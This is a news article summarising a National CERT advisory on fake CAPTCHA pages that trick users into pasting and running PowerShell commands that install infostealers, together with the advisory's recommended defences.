NCERT Alerts Users of Fake CAPTCHA Scams Hacking Windows via PowerShell

The National Computer Emergency Response Team (National CERT) has released a cybersecurity advisory warning of a new malware threat that uses fake CAPTCHA verification pages to mislead users.

Called “Fake CAPTCHA Pages Leveraging PowerShell for Malware Delivery,” this campaign utilizes social engineering to trick users into compromising their systems. It has already targeted regional users, especially those seeking free online content.

According to the advisory, attackers redirect users to malicious sites disguised as free media platforms, where they are prompted to complete a CAPTCHA verification. Once users interact with this fake CAPTCHA, a malicious script is copied to their clipboard, which they are manipulated into executing. PowerShell is then used to download additional malware onto the system, including information-stealing tools and network scanners, which facilitate further exploitation.

The attack unfolds when users engage with these fake CAPTCHA pages, mimicking legitimate verification processes. By clicking on the CAPTCHA, users inadvertently run harmful PowerShell scripts that install and execute malicious files from an attacker’s server. Key indicators of compromise (IOCs) include several malicious URLs and file hashes, which the advisory encourages organizations to monitor and block immediately.

The National CERT notes that this campaign enables attackers to install various types of malware, including infostealers and network scanners, allowing lateral movement within compromised networks. The malicious PowerShell commands can bypass traditional defenses, making it essential for organizations to enforce strong endpoint protection and detailed PowerShell logging.

Immediate preventive actions recommended by the National CERT include educating users on social engineering risks, particularly the dangers of copying and pasting unknown commands. Organizations are advised to monitor network traffic for suspicious activity and enable PowerShell logging to detect unauthorized actions.

The advisory also suggests implementing multi-factor authentication (MFA), limiting privileged access, and deploying endpoint detection and response (EDR) solutions to mitigate risks. Blocking all identified malicious domains and URLs is strongly urged to prevent further breaches.

Also Read

Xiaomi 15 series release date and key features

Xiaomi has officially announced that it will launch its new flagship smartphones,...